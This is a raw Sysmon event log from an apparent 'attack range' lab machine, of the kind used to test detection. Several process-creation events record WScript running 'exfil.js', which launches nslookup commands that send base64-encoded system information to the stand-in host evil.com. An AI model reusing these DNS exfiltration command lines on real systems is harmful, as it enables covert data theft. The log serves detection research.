14:21:38.613{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.613{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.597{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-9D44-000000005F02}2932C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.597{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.597{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.597{2E1864BB-18F2-629A-9B44-000000005F02}52007400C:\Windows\system32\cmd.exe{2E1864BB-18F2-629A-9D44-000000005F02}2932C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.611{2E1864BB-18F2-629A-9D44-000000005F02}2932C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F2-629A-9B44-000000005F02}5200C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkjm.tmp 2>&1 10341000x8000000000000000211371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.581{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F2-629A-9C44-000000005F02}5944C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.581{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F2-629A-9C44-000000005F02}5944C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.581{2E1864BB-18F2-629A-9C44-000000005F02}59445912C:\Windows\system32\conhost.exe{2E1864BB-18F2-629A-9B44-000000005F02}5200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000211368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.932{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50900- 354300x8000000000000000211367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.932{00000000-0000-0000-0000-000000000000}6504<unknown process>-udptruefalse127.0.0.1-50900-false127.0.0.1-53domain 10341000x8000000000000000211366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.559{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-9C44-000000005F02}5944C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.559{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.559{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.559{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.559{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.559{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-9B44-000000005F02}5200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.559{2E1864BB-18E0-629A-6742-000000005F02}39767948C:\Windows\System32\WScript.exe{2E1864BB-18F2-629A-9B44-000000005F02}5200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.562{2E1864BB-18F2-629A-9B44-000000005F02}5200C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkjm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.544{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlihvp.tmpMD5=2F8701F387AF2110E32408D0F4A242C3,SHA256=6A2A0ACD9892C9D73119665C3163E4FB9119D009FEA0026931DDF4E05E5C0E6D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.528{2E1864BB-18F2-629A-9944-000000005F02}78805364C:\Windows\system32\conhost.exe{2E1864BB-18F2-629A-9A44-000000005F02}8012C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.512{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.512{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.512{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.512{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.512{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-9A44-000000005F02}8012C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.512{2E1864BB-18F2-629A-9844-000000005F02}23285620C:\Windows\system32\cmd.exe{2E1864BB-18F2-629A-9A44-000000005F02}8012C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.522{2E1864BB-18F2-629A-9A44-000000005F02}8012C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F2-629A-9844-000000005F02}2328C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlihvp.tmp 2>&1 10341000x8000000000000000211349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.497{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F2-629A-9944-000000005F02}7880C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.497{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F2-629A-9944-000000005F02}7880C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.481{2E1864BB-18F2-629A-9944-000000005F02}78805364C:\Windows\system32\conhost.exe{2E1864BB-18F2-629A-9844-000000005F02}2328C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.478{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-9944-000000005F02}7880C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 